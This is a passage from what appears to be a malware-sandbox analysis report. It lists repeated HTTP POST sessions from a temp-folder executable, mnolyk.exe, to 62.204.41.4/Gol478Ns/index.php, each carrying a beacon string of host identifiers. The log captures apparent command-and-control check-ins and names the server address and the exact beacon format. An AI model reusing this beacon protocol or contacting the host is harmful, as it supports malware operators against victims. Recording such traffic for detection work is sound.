                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:10.066962004 CET483INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      510192.168.2.75023862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:16.299287081 CET970OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:16.364350080 CET970INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      511192.168.2.75023962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:16.554900885 CET971OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:16.617705107 CET971INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      512192.168.2.75024062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:16.797444105 CET972OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:16.862142086 CET972INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      513192.168.2.75024162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:17.040111065 CET973OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:17.107961893 CET973INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      514192.168.2.75024262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:17.282352924 CET974OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:17.346925020 CET974INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      515192.168.2.75024362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:17.517771959 CET975OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:17.582851887 CET975INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      516192.168.2.75024462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:17.760139942 CET976OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:17.822911024 CET976INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      517192.168.2.75024562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:18.033799887 CET977OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:18.099890947 CET977INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      518192.168.2.75024662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:18.266166925 CET978OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:18.329782963 CET978INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      519192.168.2.75024762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:18.501382113 CET979OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:18.565172911 CET979INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      52192.168.2.74977662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:10.243724108 CET484OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:10.306922913 CET484INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      520192.168.2.75024862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:18.734487057 CET980OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:18.797333956 CET980INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      521192.168.2.75024962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:18.972465992 CET981OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:19.037753105 CET981INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      522192.168.2.75025062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:19.214720964 CET982OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:19.280652046 CET982INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      523192.168.2.75025162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:19.454937935 CET983OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:19.519831896 CET983INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      524192.168.2.75025262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:19.689918995 CET984OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:19.752756119 CET984INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      525192.168.2.75025362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:19.923434973 CET985OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:19.989942074 CET985INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      526192.168.2.75025462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:20.179239988 CET986OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:20.245098114 CET986INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      527192.168.2.75025562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:20.425504923 CET987OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:20.489131927 CET987INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
